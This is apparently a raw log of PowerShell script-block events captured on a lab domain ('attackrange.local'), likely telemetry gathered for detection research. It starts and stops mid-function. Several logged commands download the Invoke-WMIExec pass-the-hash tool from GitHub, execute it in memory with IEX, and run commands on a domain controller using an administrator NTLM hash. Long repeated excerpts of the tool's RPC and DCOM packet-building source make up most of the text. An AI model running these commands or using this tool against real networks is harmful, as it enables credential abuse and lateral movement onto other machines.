$packet_NTLMSSPVerifier.Add("NTLMSSPVerifierChecksum",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierSequenceNumber",$packet_sequence_number) return $packet_NTLMSSPVerifier } function New-PacketDCOMRemQueryInterface { param([Byte[]]$packet_causality_ID,[Byte[]]$packet_IPID,[Byte[]]$packet_IID) $packet_DCOMRemQueryInterface = New-Object System.Collections.Specialized.OrderedDictionary $packet_DCOMRemQueryInterface.Add("VersionMajor",[Byte[]](0x05,0x00)) $packet_DCOMRemQueryInterface.Add("VersionMinor",[Byte[]](0x07,0x00)) $packet_DCOMRemQueryInterface.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("CausalityID",$packet_causality_ID) $packet_DCOMRemQueryInterface.Add("Reserved2",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("IPID",$packet_IPID) $packet_DCOMRemQueryInterface.Add("Refs",[Byte[]](0x05,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("IIDs",[Byte[]](0x01,0x00)) $packet_DCOMRemQueryInterface.Add("Unknown",[Byte[]](0x00,0x00,0x01,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("IID",$packet_IID) return $packet_DCOMRemQueryInterface } function New-PacketDCOMRemRelease { param([Byte[]]$packet_causality_ID,[Byte[]]$packet_IPID,[Byte[]]$packet_IPID2) $packet_DCOMRemRelease = New-Object System.Collections.Specialized.OrderedDictionary $packet_DCOMRemRelease.Add("VersionMajor",[Byte[]](0x05,0x00)) $packet_DCOMRemRelease.Add("VersionMinor",[Byte[]](0x07,0x00)) $packet_DCOMRemRelease.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("CausalityID",$packet_causality_ID) $packet_DCOMRemRelease.Add("Reserved2",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("Unknown",[Byte[]](0x02,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("InterfaceRefs",[Byte[]](0x02,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("IPID",$packet_IPID) $packet_DCOMRemRelease.Add("PublicRefs",[Byte[]](0x05,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("PrivateRefs",4ddf5b2c-86ea-4409-b8f0-f4d322772c3d 4104152150x0719346Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11{[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target 10.0.1.14 -Username attackrange.local\administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}49ffee56-fb8c-434a-9841-654be20885c3 4104152150x0719344Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11& {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target 10.0.1.14 -Username attackrange.local\administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}5df409c7-f2d2-41f9-9923-6a410a78508c 4104132150x0719111Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local18function Invoke-WMIExec { <# .SYNOPSIS Invoke-WMIExec performs WMI command execution on targets using NTLMv2 pass the hash authentication. Author: Kevin Robertson (@kevin_robertson) License: BSD 3-Clause .PARAMETER Target Hostname or IP address of target. .PARAMETER Username Username to use for authentication. .PARAMETER Domain Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. .PARAMETER Hash NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. .PARAMETER Command Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI on the target. .PARAMETER Sleep Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try tweaking this setting if you are experiencing strange results. .EXAMPLE Execute a command. Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose .EXAMPLE Check command execution privilege. Invoke-WMIExec -Target 192.168.100.20 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 .LINK https://github.com/Kevin-Robertson/Invoke-TheHash #> [CmdletBinding()] param ( [parameter(Mandatory=$true)][String]$Target, [parameter(Mandatory=$true)][String]$Username, [parameter(Mandatory=$false)][String]$Domain, [parameter(Mandatory=$false)][String]$Command, [parameter(Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, [parameter(Mandatory=$false)][Int]$Sleep=10 ) if($Command) { $WMI_execute = $true } function ConvertFrom-PacketOrderedDictionary { param($packet_ordered_dictionary) ForEach($field in $packet_ordered_dictionary.Values) { $byte_array += $field } return $byte_array } #RPC function New-PacketRPCBind { param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version) [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID) $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCBind.Add("Version",[Byte[]](0x05)) $packet_RPCBind.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCBind.Add("PacketType",[Byte[]](0x0b)) $packet_RPCBind.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCBind.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCBind.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCBind.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("CallID",$packet_call_ID_bytes) $packet_RPCBind.Add("MaxXmitFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("MaxRecvFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("AssocGroup",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("NumCtxItems",$packet_num_ctx_items) $packet_RPCBind.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID",$packet_context_ID) $packet_RPCBind.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown2",[Byte[]](0x00)) $packet_RPCBind.Add("Interface",$packet_UUID) $packet_RPCBind.Add("InterfaceVer",$packet_UUID_version) $packet_RPCBind.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCBind.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) if($packet_num_ctx_items[0] -eq 2) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) } elseif($packet_num_ctx_items[0] -eq 3) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x02,0x00)) $packet_RPCBind.Add("NumTransItems3",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown4",[Byte[]](0x00)) $packet_RPCBind.Add("Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x04)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID4",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } if($packet_call_ID -eq 3) { $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } return $packet_RPCBind } function New-PacketRPCAUTH3 { param([Byte[]]$packet_NTLMSSP) [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length)[0,1] [Byte[]]$packet_RPC_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length + 28)[0,1] $packet_RPCAuth3 = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAuth3.Add("Version",[Byte[]](0x05)) $packet_RPCAuth3.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAuth3.Add("PacketType",[Byte[]](0x10)) $packet_RPCAuth3.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAuth3.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAuth3.Add("FragLength",$packet_RPC_length) $packet_RPCAuth3.Add("AuthLength",$packet_NTLMSSP_length) $packet_RPCAuth3.Add("CallID",[Byte[]](0x03,0x00,0x00,0x00)) $packet_RPCAuth3.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("AuthType",[Byte[]](0x0a)) $packet_RPCAuth3.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCAuth3.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCAuth3.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCAuth3.Add("ContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCAuth3.Add("NTLMSSP",$packet_NTLMSSP) return $packet_RPCAuth3 } function New-PacketRPCRequest { param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data) if($packet_auth_length -gt 0) { $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8 } [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length) [Byte[]]$packet_frag_length = $packet_write_length[0,1] [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length) [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)[0,1] $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCRequest.Add("Version",[Byte[]](0x05)) $packet_RPCRequest.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketType",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketFlags",$packet_flags) $packet_RPCRequest.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCRequest.Add("FragLength",$packet_frag_length) $packet_RPCRequest.Add("AuthLength",$packet_auth_length) $packet_RPCRequest.Add("CallID",$packet_call_ID) $packet_RPCRequest.Add("AllocHint",$packet_alloc_hint) $packet_RPCRequest.Add("ContextID",$packet_context_ID) $packet_RPCRequest.Add("Opnum",$packet_opnum) if($packet_data.Length) { $packet_RPCRequest.Add("Data",$packet_data) } return $packet_RPCRequest } function New-PacketRPCAlterContext { param([Byte[]]$packet_assoc_group,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_interface_UUID) $packet_RPCAlterContext = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAlterContext.Add("Version",[Byte[]](0x05)) $packet_RPCAlterContext.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAlterContext.Add("PacketType",[Byte[]](0x0e)) $packet_RPCAlterContext.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAlterContext.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAlterContext.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCAlterContext.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("CallID",$packet_call_ID) $packet_RPCAlterContext.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("AssocGroup",$packet_assoc_group) $packet_RPCAlterContext.Add("NumCtxItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCAlterContext.Add("ContextID",$packet_context_ID) $packet_RPCAlterContext.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown2",[Byte[]](0x00)) $packet_RPCAlterContext.Add("Interface",$packet_interface_UUID) $packet_RPCAlterContext.Add("InterfaceVer",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCAlterContext.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) return $packet_RPCAlterContext } function New-PacketNTLMSSPVerifier { param([Int]$packet_auth_padding,[Byte[]]$packet_auth_level,[Byte[]]$packet_sequence_number) $packet_NTLMSSPVerifier = New-Object System.Collections.Specialized.OrderedDictionary if($packet_auth_padding -eq 4) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x04 } elseif($packet_auth_padding -eq 8) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x08 } elseif($packet_auth_padding -eq 12) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x0c } else { [Byte[]]$packet_auth_pad_length = 0x00 } $packet_NTLMSSPVerifier.Add("AuthType",[Byte[]](0x0a)) $packet_NTLMSSPVerifier.Add("AuthLevel",$packet_auth_level) $packet_NTLMSSPVerifier.Add("AuthPadLen",$packet_auth_pad_length) $packet_NTLMSSPVerifier.Add("AuthReserved",[Byte[]](0x00)) $packet_NTLMSSPVerifier.Add("AuthContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierVersionNumber",[Byte[]](0x01,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierChecksum",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierSequenceNumber",$packet_sequence_number) return $packet_NTLMSSPVerifier } function New-PacketDCOM9bd889ff-1653-45d8-9494-a579a0630b93 4104152150x0719105Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11{[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target MSWIN-DC01 -Username attackrange.local\administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}3e400f3d-73d0-4b98-a8d3-20cd15fd8c32 4104152150x0719103Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11& {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target MSWIN-DC01 -Username attackrange.local\administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}7ffcaa2e-89d1-4871-a7a2-dc9c4dd7b0f4 4104132150x0718610Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local18function Invoke-WMIExec { <# .SYNOPSIS Invoke-WMIExec performs WMI command execution on targets using NTLMv2 pass the hash authentication. Author: Kevin Robertson (@kevin_robertson) License: BSD 3-Clause .PARAMETER Target Hostname or IP address of target. .PARAMETER Username Username to use for authentication. .PARAMETER Domain Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. .PARAMETER Hash NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. .PARAMETER Command Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI on the target. .PARAMETER Sleep Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try tweaking this setting if you are experiencing strange results. .EXAMPLE Execute a command. Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose .EXAMPLE Check command execution privilege. Invoke-WMIExec -Target 192.168.100.20 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 .LINK https://github.com/Kevin-Robertson/Invoke-TheHash #> [CmdletBinding()] param ( [parameter(Mandatory=$true)][String]$Target, [parameter(Mandatory=$true)][String]$Username, [parameter(Mandatory=$false)][String]$Domain, [parameter(Mandatory=$false)][String]$Command, [parameter(Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, [parameter(Mandatory=$false)][Int]$Sleep=10 ) if($Command) { $WMI_execute = $true } function ConvertFrom-PacketOrderedDictionary { param($packet_ordered_dictionary) ForEach($field in $packet_ordered_dictionary.Values) { $byte_array += $field } return $byte_array } #RPC function New-PacketRPCBind { param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version) [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID) $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCBind.Add("Version",[Byte[]](0x05)) $packet_RPCBind.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCBind.Add("PacketType",[Byte[]](0x0b)) $packet_RPCBind.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCBind.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCBind.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCBind.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("CallID",$packet_call_ID_bytes) $packet_RPCBind.Add("MaxXmitFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("MaxRecvFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("AssocGroup",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("NumCtxItems",$packet_num_ctx_items) $packet_RPCBind.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID",$packet_context_ID) $packet_RPCBind.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown2",[Byte[]](0x00)) $packet_RPCBind.Add("Interface",$packet_UUID) $packet_RPCBind.Add("InterfaceVer",$packet_UUID_version) $packet_RPCBind.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCBind.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) if($packet_num_ctx_items[0] -eq 2) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) } elseif($packet_num_ctx_items[0] -eq 3) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x02,0x00)) $packet_RPCBind.Add("NumTransItems3",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown4",[Byte[]](0x00)) $packet_RPCBind.Add("Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x04)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID4",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } if($packet_call_ID -eq 3) { $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } return $packet_RPCBind } function New-PacketRPCAUTH3 { param([Byte[]]$packet_NTLMSSP) [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length)[0,1] [Byte[]]$packet_RPC_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length + 28)[0,1] $packet_RPCAuth3 = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAuth3.Add("Version",[Byte[]](0x05)) $packet_RPCAuth3.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAuth3.Add("PacketType",[Byte[]](0x10)) $packet_RPCAuth3.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAuth3.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAuth3.Add("FragLength",$packet_RPC_length) $packet_RPCAuth3.Add("AuthLength",$packet_NTLMSSP_length) $packet_RPCAuth3.Add("CallID",[Byte[]](0x03,0x00,0x00,0x00)) $packet_RPCAuth3.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("AuthType",[Byte[]](0x0a)) $packet_RPCAuth3.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCAuth3.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCAuth3.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCAuth3.Add("ContextID",[Byte[]](0x00,0x00,0x00,0x00)) 